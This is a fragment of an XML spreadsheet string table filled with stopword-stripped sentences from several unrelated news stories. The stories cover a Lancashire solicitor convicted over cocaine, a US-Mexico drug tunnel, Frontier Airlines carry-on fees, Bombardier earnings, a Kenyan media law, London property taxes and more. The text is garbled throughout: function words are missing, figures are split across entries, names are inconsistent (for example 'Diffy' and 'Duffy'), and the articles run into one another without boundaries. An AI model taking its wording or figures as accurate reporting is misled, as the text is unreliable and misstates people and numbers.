    <t xml:space="preserve"> The solicitor , nicknamed &amp;quot; Bash &amp;quot; hailed criminals &amp;quot; top brief , &amp;quot; arrested home 2011 following police surveillance operation Scarborough , represented previous narcotics trial </t>
  </si>
  <si>
    <t xml:space="preserve"> Officers spotted Sarborough , 32 , dropping three bags cocaine lawyer &amp;apos;s home Blackburn , Lancashire , Law Society dinner colleagues </t>
  </si>
  <si>
    <t xml:space="preserve"> Inquiries revealed Ditta &amp;quot; regular user &amp;quot; Class A drug tests found traces cocaine hair , wallet credit cards </t>
  </si>
  <si>
    <t xml:space="preserve"> Over eight month period January August 2011 sought illicitly obtain information arrests two men behalf Scarborough well one associates </t>
  </si>
  <si>
    <t xml:space="preserve"> All four suspects watched police time part major investigation heroin cocaine racket operating across Lancashire , Cumbria , Merseyside , Berkshire West Yorkshire </t>
  </si>
  <si>
    <t xml:space="preserve"> They 32 men later jailed police seized heroin cocaine worth £ 1</t>
  </si>
  <si>
    <t xml:space="preserve">5million along £ 200,000 cash series raids </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</si>
  <si>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</si>
  <si>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 xml:space="preserve"> He admitted cocaine possession earlier hearing </t>
  </si>
  <si>
    <t xml:space="preserve"> The lawyer &amp;apos;s downfall came police investigating Scarborough discovered regular phone contact Ditta February 2011 </t>
  </si>
  <si>
    <t xml:space="preserve"> Two detectives trailed suspect spotted arriving Ditta &amp;apos;s house seen place drugs purity 60 per cent lawyer &amp;apos;s bins black golf glove </t>
  </si>
  <si>
    <t xml:space="preserve"> Soon drop , Scarborough regular phone contact Ditta dinner Blackburn Rovers football stadium , Ewood Park </t>
  </si>
  <si>
    <t xml:space="preserve"> The lawyer returned home discover drugs nine communications </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</si>
  <si>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</si>
  <si>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 xml:space="preserve"> &amp;quot; During arrest Ditta picked wallet tried remove several credit cards seized hair sample taken fom </t>
  </si>
  <si>
    <t xml:space="preserve"> In police interview said ran office home address well work place clients would call house legal business </t>
  </si>
  <si>
    <t xml:space="preserve"> But court heard would call major players drugs supply chain , previously represented , key arrests tell detectives knew </t>
  </si>
  <si>
    <t xml:space="preserve"> Prosecuting , Anne Whyte said: &amp;quot; If anyone know break law , criminal solicitor </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Mr Ditta accused abusing position criminal solicitor , become involved specific clients </t>
  </si>
  <si>
    <t xml:space="preserve"> The relationship talking simply drug dealer , drug dealer providing lawyer drugs </t>
  </si>
  <si>
    <t xml:space="preserve"> Some communications undoubtedly legitimate ones lawyer </t>
  </si>
  <si>
    <t xml:space="preserve"> But went way beyond ordinary confines lawyer-client relationship </t>
  </si>
  <si>
    <t xml:space="preserve"> He thwarted police &amp;apos;s investigation much possible enable continue criminal activities </t>
  </si>
  <si>
    <t xml:space="preserve"> Mr Ditta honouring profession , dishonouring </t>
  </si>
  <si>
    <t xml:space="preserve"> He got close certain clients , particular Scarborough , allowed independence compromised </t>
  </si>
  <si>
    <t xml:space="preserve"> Ditta denied wrongdoing claimed: &amp;quot; If I corrupt lawyer , I , I wanted feed information Mr Scarborough , I would wait 15 hours , I would immediately </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; But hearing Supt Lee Halstead Lancashire Police said: &amp;quot; Mr Ditta turned criminal solicitor criminal moment started obtaining drugs organised criminals </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; His addiction cocaine left hopelessly compromised vulnerable motives leading members organised crime groups tasked obtain valuable information regarding police investigations </t>
  </si>
  <si>
    <t xml:space="preserve"> Solicitors uphold highest standards integrity instil trust confidence public </t>
  </si>
  <si>
    <t xml:space="preserve"> Mr Ditta betrayed trust attempted hide behind veneer profession </t>
  </si>
  <si>
    <t xml:space="preserve"> Lancashire &amp;apos;s Serious Organised Crime Unit led investigation Mr Ditta also seen convicted three counts possession cocaine perverting course justice , demonstrating commitment bringing criminals justice </t>
  </si>
  <si>
    <t xml:space="preserve"> Let case serve warning criminals one beyond reach law </t>
  </si>
  <si>
    <t xml:space="preserve"> We find put courts </t>
  </si>
  <si>
    <t xml:space="preserve"> Scarborough jailed 14 years pleading guilty conspiracy supply heroin , cocaine cannabis </t>
  </si>
  <si>
    <t xml:space="preserve"> Thirty five men involved racket jailed total 153 years drugs offences </t>
  </si>
  <si>
    <t xml:space="preserve"> On website Ditta gave question answer session says fantasy job would lawyer representing clients Death Row America , ultimate dinner guest Mohammed Ali inequality motivation work </t>
  </si>
  <si>
    <t xml:space="preserve"> US-Mexico drug tunnel railway found One sophisticated drug smuggling tunnels USA Mexico found , complete lighting , ventilation electric rail systems </t>
  </si>
  <si>
    <t xml:space="preserve"> US authorities described four foot three foot tunnel one sophisticated secret passages ever discovered </t>
  </si>
  <si>
    <t xml:space="preserve"> The tunnel , zigzags length nearly six football pitches , links warehouses near Tijuana , Mexico San Diego , USA </t>
  </si>
  <si>
    <t xml:space="preserve"> The area filled nondescript warehouses , making easier conceal trucks loaded drugs </t>
  </si>
  <si>
    <t xml:space="preserve"> The tunnel shut drugs made undetected , authorities said </t>
  </si>
  <si>
    <t xml:space="preserve"> Authorities seized eight-and-a-half tons marijuana 327 pounds cocaine connection tunnel &amp;apos;s discovery , according court records </t>
  </si>
  <si>
    <t xml:space="preserve"> Three men authorities say worked drivers charged possession marijuana cocaine intent distribute </t>
  </si>
  <si>
    <t xml:space="preserve"> They face prison sentences 10 years life imprisonment convicted </t>
  </si>
  <si>
    <t xml:space="preserve"> In Nogales , Arizona , smugglers tap vast underground drainage canals </t>
  </si>
  <si>
    <t xml:space="preserve"> The tunnel eighth major passage discovered San Diego since 2006 </t>
  </si>
  <si>
    <t xml:space="preserve"> In 2010 , authorities found roughly 700-yard passage equipped rail tracks extended kitchen Tijuana home two San Diego warehouses </t>
  </si>
  <si>
    <t xml:space="preserve"> Frontier Airlines charge carry-on baggage Frontier Airlines plans charge $ 100 passengers store carry-on luggage board flight </t>
  </si>
  <si>
    <t xml:space="preserve"> Frontier Airlines plans start charging $ 100 carry-on bag $ 2 coffee soda , although announcement Wednesday say passengers get keep whole </t>
  </si>
  <si>
    <t xml:space="preserve"> The new carry-on fee bags overhead bin , small bags seat still free </t>
  </si>
  <si>
    <t xml:space="preserve"> Frontier said charge $ 25 fee paid advance , $ 100 travelers wait pay &amp;apos;re gate </t>
  </si>
  <si>
    <t xml:space="preserve"> Frontier spokeswoman Kate O &amp;apos;Malley said $ 100 fee get travelers take care charge advance </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; We &amp;apos;t want charge , &amp;quot; said </t>
  </si>
  <si>
    <t xml:space="preserve"> Airlines began charging first second checked bags 2008 </t>
  </si>
  <si>
    <t xml:space="preserve"> Passengers trying avoid fees stuffing much carry-on baggage stashed overhead bins , meaning bins often run space </t>
  </si>
  <si>
    <t xml:space="preserve"> Fees one way get passengers bring less board </t>
  </si>
  <si>
    <t xml:space="preserve"> O &amp;apos;Malley said new charge really raising money </t>
  </si>
  <si>
    <t xml:space="preserve"> It &amp;apos;s Frontier &amp;apos;s loyal customers making clear finding overhead bin space become increasingly difficult </t>
  </si>
  <si>
    <t xml:space="preserve"> Passengers buy tickets airline &amp;apos;s website &amp;apos;t pay </t>
  </si>
  <si>
    <t xml:space="preserve"> That means one passenger line Frontier gate might get bring bag free , next person line might owe $ 100 similar bag </t>
  </si>
  <si>
    <t xml:space="preserve"> O &amp;apos;Malley said Frontier &amp;apos;s website check-in procedures changed make sure passengers know fee get gate </t>
  </si>
  <si>
    <t xml:space="preserve"> Frontier &amp;apos;s new carry-on fee &amp;apos;t start summer , though date &amp;apos;t set </t>
  </si>
  <si>
    <t xml:space="preserve"> Passengers often grumble baggage charges fees , airlines love </t>
  </si>
  <si>
    <t xml:space="preserve"> They argue luggage costs money handle , passengers want service pay </t>
  </si>
  <si>
    <t xml:space="preserve"> Many Wall Street view addition baggage fees sign airlines charging enough money cover cost air travel years losses </t>
  </si>
  <si>
    <t xml:space="preserve"> Most &amp;apos;t touched carry-on bag fees , though </t>
  </si>
  <si>
    <t xml:space="preserve"> Spirit Airlines Inc</t>
  </si>
  <si>
    <t xml:space="preserve"> started first carry-on fee three years ago , fellow discounter Allegiant Air later followed </t>
  </si>
  <si>
    <t xml:space="preserve"> The airline fee Hungary &amp;apos;s Wizz Air , said airline consultant Jay Sorensen , closely tracks add-on fees </t>
  </si>
  <si>
    <t xml:space="preserve"> He estimated December 2011 report Spirit &amp;apos;s carry-on fee brings $ 50 million year </t>
  </si>
  <si>
    <t xml:space="preserve"> Sorensen , former executive Midwest Airlines , flew Spirit recently wondered &amp;apos;d find gate passengers encountered Spirit &amp;apos;s unusual carry-on bag fee </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; The boarding process smoothest I seen airline career , &amp;quot; said </t>
  </si>
  <si>
    <t xml:space="preserve"> I expecting see gnashing teeth fight breaking gate </t>
  </si>
  <si>
    <t xml:space="preserve"> The plane full , said , &amp;quot; boarded lickety-split </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Frontier also following Spirit &amp;apos;s $ 2 charge coffee , tea , soda , juice </t>
  </si>
  <si>
    <t xml:space="preserve"> Frontier said passengers get soda juice keep whole , give coffee refills free </t>
  </si>
  <si>
    <t xml:space="preserve"> It still give away water </t>
  </si>
  <si>
    <t xml:space="preserve"> US Airways briefly tried charging beverages 2008 backed seven months later passengers complained major airline followed </t>
  </si>
  <si>
    <t xml:space="preserve"> Frontier &amp;apos;s move charge carry-on fee passengers &amp;apos;t buy direct airline latest effort steer customers toward website </t>
  </si>
  <si>
    <t xml:space="preserve"> Airlines pay online travel sellers Orbitz $ 10 $ 25 ticket sold </t>
  </si>
  <si>
    <t xml:space="preserve"> That given airlines incentive steer passengers buy directly instead going online travel agency </t>
  </si>
  <si>
    <t xml:space="preserve"> Frontier gone furthest area , though </t>
  </si>
  <si>
    <t xml:space="preserve"> In September began giving half many frequent flier miles customers bought online travel agency </t>
  </si>
  <si>
    <t xml:space="preserve"> On Wednesday slashed mileage award 25 percent miles trip </t>
  </si>
  <si>
    <t xml:space="preserve"> So , 1,000 mile Frontier trip purchased online travel agency would earn 250 miles </t>
  </si>
  <si>
    <t xml:space="preserve"> It also allows passengers choose seat advance buy directly Frontier website </t>
  </si>
  <si>
    <t xml:space="preserve"> Frontier loyal base customers home city Denver , business shrinking losing money </t>
  </si>
  <si>
    <t xml:space="preserve"> Revenue dropped 9 percent flying capacity shrank almost 13 percent first quarter , according financial results released Wednesday corporate parent Republic Airways Holdings Inc </t>
  </si>
  <si>
    <t xml:space="preserve"> Republic trying fix Frontier &amp;apos;s finances part selling airline </t>
  </si>
  <si>
    <t xml:space="preserve"> US borders: &amp;quot; Super tunnel &amp;quot; drug smuggling discovered On border Mexico USA , investigators discovered shut &amp;quot; super tunnel &amp;quot; intended drug smuggling </t>
  </si>
  <si>
    <t xml:space="preserve"> As announced US Customs Authorities , pipe Tijuana San Diego , measuring 500 metres length , equipped electricity , railway track ventilation system </t>
  </si>
  <si>
    <t xml:space="preserve"> Three suspects detained relation discovery , eight tonnes marijuana almost 150 kilograms cocaine seized </t>
  </si>
  <si>
    <t xml:space="preserve"> According details provided , tunnel yet put use </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; These cartels stupid think dig radar , &amp;quot; said US Attorney District Southern California , Laura Diffy , press conference held front warehouse San Diego , end tunnel discovered </t>
  </si>
  <si>
    <t xml:space="preserve"> Referring drug gangs , Duffy assured: &amp;quot; If continue build attempt use tunnels , determined make big waste dirty money &amp;quot; </t>
  </si>
  <si>
    <t xml:space="preserve"> Both US authorities Mexican security forces engaged ongoing battle drug cartels </t>
  </si>
  <si>
    <t xml:space="preserve"> Since 2006 , 77,000 people killed conjunction drug crime Mexico </t>
  </si>
  <si>
    <t xml:space="preserve"> Built experts Due elaborate configuration tunnel , investigators working assumption build architects engineers construction took around one year </t>
  </si>
  <si>
    <t xml:space="preserve"> The railway system equipped way electrically powered carts could used </t>
  </si>
  <si>
    <t xml:space="preserve"> On Mexican side , entrance located building located 80 metres border </t>
  </si>
  <si>
    <t xml:space="preserve"> According authorities , ladder runs 20 metres underground actual entrance tunnel </t>
  </si>
  <si>
    <t xml:space="preserve"> The tunnel cross-section measuring 1</t>
  </si>
  <si>
    <t xml:space="preserve">20 metres high 90 centimetres across </t>
  </si>
  <si>
    <t xml:space="preserve"> It would thus suitable assist illegal immigration USA </t>
  </si>
  <si>
    <t xml:space="preserve"> Two suspects detained conjunction cocaine find </t>
  </si>
  <si>
    <t xml:space="preserve"> The third , Mexican , detained due seizure marijuana </t>
  </si>
  <si>
    <t xml:space="preserve"> All three face maximum penalty life imprisonment , according authorities </t>
  </si>
  <si>
    <t xml:space="preserve"> Since 2006 , eight tunnels type discovered , press conference San Diego continued </t>
  </si>
  <si>
    <t xml:space="preserve"> However , first time cocaine found tunnel construction </t>
  </si>
  <si>
    <t xml:space="preserve"> Normally cocaine smuggled smaller quantities tunnels </t>
  </si>
  <si>
    <t xml:space="preserve"> This shows &amp;quot; desperation &amp;quot; drug gangs , whose traditional routes cut , said Bill Sherman DEA Drug Squad San Diego </t>
  </si>
  <si>
    <t xml:space="preserve"> They anything make USA </t>
  </si>
  <si>
    <t xml:space="preserve"> No specific details given regarding detained , reported least one Mexican They expect prison terms ten years </t>
  </si>
  <si>
    <t xml:space="preserve"> Dog-lovers victorious Once athletes Bitz dog-lovers association victorious Rally Obedience Tournament </t>
  </si>
  <si>
    <t xml:space="preserve"> Achim Scherrenbacher started things Kandel two dogs; bitch Sandy achieved 94 points Beginners class thus took fifth place , 15-month-old Marley took twelfth place 87 points </t>
  </si>
  <si>
    <t xml:space="preserve"> With dog Woody competing Class 1 competition , Susi Höpp subject critical scrutiny judge </t>
  </si>
  <si>
    <t xml:space="preserve"> Land Rover rally series announced The interior racing seats six-point harness belts , well intercom system </t>
  </si>
  <si>
    <t xml:space="preserve"> Options include upgraded brakes , service package providing access Bowler Works mechanics , logistic support , vehicle storage events </t>
  </si>
  <si>
    <t xml:space="preserve"> Drew Bowler , managing director Bowler Motorsport , said: &amp;quot; Rally customers coming Bowler changed </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; They &amp;apos;re experienced racers , people looking excitement adventure , achievable path towards world-class events </t>
  </si>
  <si>
    <t xml:space="preserve"> We &amp;apos;re delighted offering path partnership Land Rover MSA , believe format offers new way experience different rally disciplines UK overseas , prepare entrants rigours realities Rally Raid </t>
  </si>
  <si>
    <t xml:space="preserve"> We &amp;apos;ve really enjoyed developing Defender Challenge car - &amp;apos;ll really fun championship </t>
  </si>
  <si>
    <t xml:space="preserve"> Additionally , Defender Challenge provide training test day February , well option compete desert events North Africa Middle East </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</si>
  <si>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</si>
  <si>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 xml:space="preserve"> Fay &amp;apos;s innovation extended years , recently New York Comedy Festival </t>
  </si>
  <si>
    <t xml:space="preserve"> Created overseen Caroline Hirsch , founder standup institution Carolines , festival celebrates tenth anniversary year , sixty shows small clubs large theatres </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Most headliners appeared Carolines , went greater success , point &amp;apos;re big play club , &amp;quot; Hirsch said </t>
  </si>
  <si>
    <t xml:space="preserve"> We built festival way continuing work </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</si>
  <si>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</si>
  <si>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 xml:space="preserve"> As festival expanded , world comedy </t>
  </si>
  <si>
    <t xml:space="preserve"> Nick Kroll rose prominence deep-cable sitcom (FXX &amp;apos;s gleefully raunchy fantasy-football-themed &amp;quot; The League &amp;quot;) Comedy Central sketch show </t>
  </si>
  <si>
    <t xml:space="preserve"> Jenny Slate cast member &amp;quot; Saturday Night Live &amp;quot; &amp;quot; Parks Recreation , &amp;quot; though best known viral video series &amp;quot; Marcel Shell Shoes On </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Both Kroll Slate , well young comedians distinctive voices (the surreally pessimistic Anthony Jeselnik , wry , racially focussed W</t>
  </si>
  <si>
    <t xml:space="preserve"> Kamau Bell), products decentralized world American comedy </t>
  </si>
  <si>
    <t xml:space="preserve"> One festival &amp;apos;s biggest draws interview: David Steinberg talking Larry David </t>
  </si>
  <si>
    <t xml:space="preserve"> Steinberg started standup comedian become accomplished television film director , well unofficial comedy historian </t>
  </si>
  <si>
    <t xml:space="preserve"> From 2005 2007 , hosted show TV Land called &amp;quot; Sit Down Comedy David Steinberg </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; The meeting takes place Town Hall , center Manhattan </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; The city definitely comedy DNA Larry &amp;apos;s work , &amp;quot; Steinberg said </t>
  </si>
  <si>
    <t xml:space="preserve"> He telling , &amp;apos;s , sometimes &amp;apos;ll walk alley two buildings think , Hey , I lose money , maybe I &amp;apos;ll live </t>
  </si>
  <si>
    <t xml:space="preserve"> Australian woman appeals Thai jail time A 21-year-old Sydney woman sentenced 15 days jail Phuket falsely claiming assaulted taxi driver appealing verdict granted bail </t>
  </si>
  <si>
    <t xml:space="preserve"> Stevie Rochelle Bamford initially found guilty Phuket provincial court June 15 making false claims telling Thai police local taxi driver , two men restraining , carried assault early hours Sunday June 10 </t>
  </si>
  <si>
    <t xml:space="preserve"> However , CCTV footage later revealed returned hotel safely becoming separated Australian boyfriend </t>
  </si>
  <si>
    <t xml:space="preserve"> Phuket police interviewed Bamford two days confessed fabricating story </t>
  </si>
  <si>
    <t xml:space="preserve"> Bamford sentenced serve 15-day prison term low security detention centre outskirts Phuket rather adult women &amp;apos;s jail </t>
  </si>
  <si>
    <t xml:space="preserve"> Tunks told Sydney &amp;apos;s Sunday Telegraph whole family &amp;quot; extremely concerned &amp;quot; daughter &amp;apos;s welfare wanted back Australia </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; It &amp;apos;s obviously worrying time &amp;apos;re hopeful back home safely soon possible , &amp;quot; Tunks said </t>
  </si>
  <si>
    <t xml:space="preserve"> Bamford appealing sentence granted bail 50,000 baht </t>
  </si>
  <si>
    <t xml:space="preserve"> Reports Australia said meantime , holidaying resort area Krabi Southern Thailand </t>
  </si>
  <si>
    <t xml:space="preserve"> Thai-based legal sources said Bamford represented local lawyer Phuket warned appeal may lead court increasing sentence two years forcing serve adult prison </t>
  </si>
  <si>
    <t xml:space="preserve"> However , following recent murder Australian travel agent Michelle Smith Phuket , Thailand may also looking repair battered tourist image , leading acquittal </t>
  </si>
  <si>
    <t xml:space="preserve"> Bombardier profit dips plane deliveries , orders fall Canadian plane train maker Bombardier Inc reported 15 percent fall net profit Thursday , pressured fewer aircraft orders deliveries third quarter contract issues train unit </t>
  </si>
  <si>
    <t xml:space="preserve"> Montreal-based Bombardier also release flight test data brand-new CSeries aircraft offer update whether plane meet ambitious schedule going commercial service next September </t>
  </si>
  <si>
    <t xml:space="preserve"> After test plane &amp;apos;s inaugural flight month half ago , flown three times , raising questions whether testing phase track </t>
  </si>
  <si>
    <t xml:space="preserve"> Results fell short forecasts sent shares sliding 8 percent Toronto Stock Exchange </t>
  </si>
  <si>
    <t xml:space="preserve"> Cameron Doerksen , analyst National Bank Financial , lowered rating &amp;quot; sector perform &amp;quot; &amp;quot; outperform &amp;quot; Thursday view stock limited upside next one two quarters </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; While weaker aircraft deliveries mostly anticipated , clearly disappointed margin performance transportation , &amp;quot; Doerksen said client note </t>
  </si>
  <si>
    <t xml:space="preserve"> We believe Bombardier receive new orders CSeries flight test program progresses </t>
  </si>
  <si>
    <t xml:space="preserve"> However , new orders announced coming months , suspect market become skeptical program </t>
  </si>
  <si>
    <t xml:space="preserve"> Bombardier hopes CSeries aircraft family catapult low end market dominated Boeing Airbus </t>
  </si>
  <si>
    <t xml:space="preserve"> The first test plane unveiled March took flight first time September months delays </t>
  </si>
  <si>
    <t xml:space="preserve"> But firm orders CSeries moderate far 177 potential buyers wait flight test results validate company &amp;apos;s claims new jetliner &amp;apos;s fuel efficiency cost savings potential </t>
  </si>
  <si>
    <t xml:space="preserve"> There currently 403 total orders commitments 15 customers operators </t>
  </si>
  <si>
    <t xml:space="preserve"> Chief Executive Officer Pierre Beaudoin confident Bombardier would meet 300 firm order target time first jet put commercial use </t>
  </si>
  <si>
    <t xml:space="preserve"> Executives also reassured analysts media Thursday program progressing according schedule </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; The test plane &amp;apos;t stay ground longer anticipated , &amp;quot; Beaudoin said conference call , adding ground tests software updates scheduled plane &amp;apos;s downtime </t>
  </si>
  <si>
    <t xml:space="preserve"> Every manufacturer schedules different way </t>
  </si>
  <si>
    <t xml:space="preserve"> We decided first flight update period &amp;apos;s done </t>
  </si>
  <si>
    <t xml:space="preserve"> That happen flight program </t>
  </si>
  <si>
    <t xml:space="preserve"> The second five test planes expected take flight coming weeks , remainder following shortly , company said </t>
  </si>
  <si>
    <t xml:space="preserve"> Still , analysts skeptical first customer begin operating CSeries plane 12 months maiden flight </t>
  </si>
  <si>
    <t xml:space="preserve"> Bombardier said evaluating entry-into-service (EIS) schedule provide update next months </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; This slow pace flight testing - although line Bombardier &amp;apos;s internal schedule apparently - reinforces view entry-into-service pushed Q1 / 15 , &amp;quot; said Doerksen </t>
  </si>
  <si>
    <t xml:space="preserve"> For third quarter ended September 30 , Bombardier &amp;apos;s net profit fell $ 147 million , 8 cents per share , $ 172 million , 9 cents per share year earlier </t>
  </si>
  <si>
    <t xml:space="preserve"> Adjusted earnings per share unchanged 9 cents </t>
  </si>
  <si>
    <t xml:space="preserve"> Revenue dipped marginally $ 4</t>
  </si>
  <si>
    <t>1 billion $ 4</t>
  </si>
  <si>
    <t xml:space="preserve">2 billion </t>
  </si>
  <si>
    <t xml:space="preserve"> Analysts expected earnings 10 cents per share revenue $ 4</t>
  </si>
  <si>
    <t>56 billion , according Thomson Reuters I / B / E / S</t>
  </si>
  <si>
    <t xml:space="preserve"> The world &amp;apos;s fourth-largest planemaker said delivered 45 aircraft quarter , 57 year earlier </t>
  </si>
  <si>
    <t xml:space="preserve"> Net orders fell 26 aircraft , 83 </t>
  </si>
  <si>
    <t xml:space="preserve"> The backlog aerospace division $ 32</t>
  </si>
  <si>
    <t xml:space="preserve">9 billion September 30 , unchanged December 31 </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; In aerospace , results line guidance , low order intake overall market conditions disappointment , &amp;quot; Beaudoin said </t>
  </si>
  <si>
    <t xml:space="preserve"> Aerospace revenue fell 13 percent $ 2 billion </t>
  </si>
  <si>
    <t xml:space="preserve"> Bombardier , world &amp;apos;s largest trainmaker , said revenue division rose nearly 11 percent $ 2</t>
  </si>
  <si>
    <t xml:space="preserve">1 billion </t>
  </si>
  <si>
    <t xml:space="preserve"> The order backlog transportation unit $ 32</t>
  </si>
  <si>
    <t xml:space="preserve">6 billion September 30 , marginally December 31 </t>
  </si>
  <si>
    <t xml:space="preserve"> The transportation division &amp;apos;s margins affected execution issues large contracts </t>
  </si>
  <si>
    <t xml:space="preserve"> Executives said new guidance would provided fourth quarter </t>
  </si>
  <si>
    <t>5 percent C $ 4</t>
  </si>
  <si>
    <t xml:space="preserve">83 mid afternoon trading Thursday </t>
  </si>
  <si>
    <t xml:space="preserve"> Brazil &amp;apos;s Embraer SA , world &amp;apos;s third-largest commercial planemaker Bombardier &amp;apos;s closest rival , reported 10 percent fall quarterly profit Thursday </t>
  </si>
  <si>
    <t xml:space="preserve"> Kenyan press outraged controversial media law &amp;quot; It frightening place , valid ask: prevent Parliament simply sweeping away independence judiciary tomorrow ? &amp;quot; paper said , challenging bill unconstitutional </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; This law draconian punitive reject , &amp;quot; said Cyrus Kamau , managing director Capital Group - home CapitalFM , one Kenya &amp;apos;s respected independent radio stations news websites </t>
  </si>
  <si>
    <t xml:space="preserve"> He said new media tribunal &amp;quot; always biased &amp;apos;s extension government , &amp;quot; restrictions content advertising would damage Kenya &amp;apos;s place global economy </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; I hope president listen us , appeal reject bill return MPs , &amp;quot; said </t>
  </si>
  <si>
    <t xml:space="preserve"> According The Star newspaper , new bill effectively hand government &amp;quot; stranglehold media , &amp;quot; The Standard said democracy free speech Kenya &amp;quot; dealt major blow &amp;quot; lambasted bill &amp;quot; draconian </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; The passing bill comes amid string measures reinforce national security wake September &amp;apos;s attack Islamist gunmen Westgate shopping mall </t>
  </si>
  <si>
    <t xml:space="preserve"> Kenya media drew ire authorities broadcasting security camera footage troops dispatched scene attack purportedly robbing upmarket mall </t>
  </si>
  <si>
    <t xml:space="preserve"> Police chief David Kimaiyo reacted summoning two journalists media executive questioning , although summons retracted following media outcry </t>
  </si>
  <si>
    <t xml:space="preserve"> Under new bill , media houses fined 20 million Kenyan shillings individual journalists one million additional risk &amp;quot; de-listed , &amp;quot; barred receiving official press accreditation </t>
  </si>
  <si>
    <t xml:space="preserve"> The tribunal also power seize property offender fine paid </t>
  </si>
  <si>
    <t xml:space="preserve"> According Daily Nation , &amp;quot; even one fine enough cripple FM stations </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; It also said measures could devastating effect described Kenya &amp;apos;s &amp;quot; lively blogosphere </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; By silencing media , politicians know whatever like impunity </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; No one ever know , &amp;quot; wrote Nation journalist Mutuma Mathiu , describing Kenyan media key source checks balances public life </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Left , politicians would bankrupt country take us back hunting gathering , &amp;quot; wrote </t>
  </si>
  <si>
    <t xml:space="preserve"> Kenyan lawmakers target public anger past </t>
  </si>
  <si>
    <t xml:space="preserve"> In May voted overturn cuts ordered national salaries commission reinstate hefty salaries around 532,000 shillings month tax-free - ranked among highest world </t>
  </si>
  <si>
    <t xml:space="preserve"> Tax foreign property owners burst London &amp;apos;s bubble The Treasury provisionally costed CGT measure awaiting final decision Mr Osborne , , 2012 Budget , introduced 7% rate stamp duty homes costing £ 2m annual charges buyers choose hold homes company rather individuals </t>
  </si>
  <si>
    <t xml:space="preserve"> Already stamp duty take residential property boroughs Westminster Kensington &amp;amp; Chelsea , stood £ 708 million 2012 / 13 tax year , exceeds combined total Northern Ireland , Wales , Scotland , North East , North West Yorkshire Humber put together </t>
  </si>
  <si>
    <t xml:space="preserve"> Mr Cook said: &amp;quot; Following increases stamp duty high value homes introduction associated anti-avoidance legislation , difficult argue high value property under-taxed irrespective effect out-dated council tax system </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; &amp;quot; But move could make foreign investors reticent buy property London current owners reluctant sell , &amp;quot; added </t>
  </si>
  <si>
    <t xml:space="preserve"> Prime property - top 5% 10% housing market price - affluent south-west London belt , stretches Fulham Wimbledon , increased record 11</t>
  </si>
  <si>
    <t xml:space="preserve">8% past year </t>
  </si>
  <si>
    <t xml:space="preserve"> Prices central London continued show steady year-on-year growth 5</t>
  </si>
  <si>
    <t>6% overshadowed burgeoning &amp;quot; domestic market &amp;quot; city &amp;apos;s south west , north (7</t>
  </si>
  <si>
    <t>4%) east (6</t>
  </si>
  <si>
    <t xml:space="preserve">5%) experiencing uptick , according research Savills </t>
  </si>
  <si>
    <t xml:space="preserve"> A stubborn ankle injury threatens prevent deployment Nicolai Müller FSV Mainz &amp;apos;s Bundesliga away match FC Augsburg </t>
  </si>
  <si>
    <t xml:space="preserve"> Mainz concerned regarding availability Nicolai Müller </t>
  </si>
  <si>
    <t xml:space="preserve"> Tomorrow attempt train team </t>
  </si>
  <si>
    <t xml:space="preserve"> Up managed individual training </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; We shortly make decision regarding whether play , &amp;quot; said manager Thomas Tuchel </t>
  </si>
  <si>
    <t xml:space="preserve"> Mainz already without injured key players Niki Zimling , Julian Baumgartlinger Niko Bungert </t>
  </si>
  <si>
    <t xml:space="preserve"> Is Europe &amp;apos;s elite ready business Britain ? Business Britain launched April pledge bring business together define UK &amp;apos;s wealth job creators want see changed relationship EU </t>
  </si>
  <si>
    <t xml:space="preserve"> To end , commissioned largest comprehensive poll British business leaders asking thoughts Britain , business EU </t>
  </si>
  <si>
    <t xml:space="preserve"> YouGov polled 1,000 business leaders , broadly representative Britain &amp;apos;s business sizes , sectors regions </t>
  </si>
  <si>
    <t xml:space="preserve"> The conclusions poll come surprise many </t>
  </si>
  <si>
    <t xml:space="preserve"> We found vast majority businesses looking export outside Europe , focusing countries modernising growing EU states stagnate </t>
  </si>
  <si>
    <t xml:space="preserve"> They want see Government prioritise new trading links likes China , India Brazil , rather getting bogged long arduous process reforming EU &amp;apos;s arcane institutions </t>
  </si>
  <si>
    <t xml:space="preserve"> When asked views specific policy areas - ranging monopoly regulation product laws - majority business leaders thought control key competences returned Westminster </t>
  </si>
  <si>
    <t xml:space="preserve"> There general discontent Single Market , businesses saying costs Brussels regulation outweighed benefits part Europe &amp;apos;s trading area - even 40 per cent large businesses , traditionally pro-European companies , agreed </t>
  </si>
  <si>
    <t xml:space="preserve"> Finally , tellingly , poll business leaders found clear majority wanted see Britain pursue course treaty change relationship EU based trade , politics </t>
  </si>
  <si>
    <t xml:space="preserve"> This finding , reflected across sizes major business groups , shows business pushing &amp;quot; meaningful change &amp;quot; brings powers back UK </t>
  </si>
  <si>
    <t xml:space="preserve"> The stakes high - achieving treaty change better deal Britain sees 16 per cent swing towards voting stay EU referendum </t>
  </si>
  <si>
    <t xml:space="preserve"> The Prime Minister doubt: poll shows British business backs plan renegotiating terms Britain &amp;apos;s membership EU </t>
  </si>
  <si>
    <t xml:space="preserve"> It also shows business expects renegotiation make significant shift current balance power back towards UK </t>
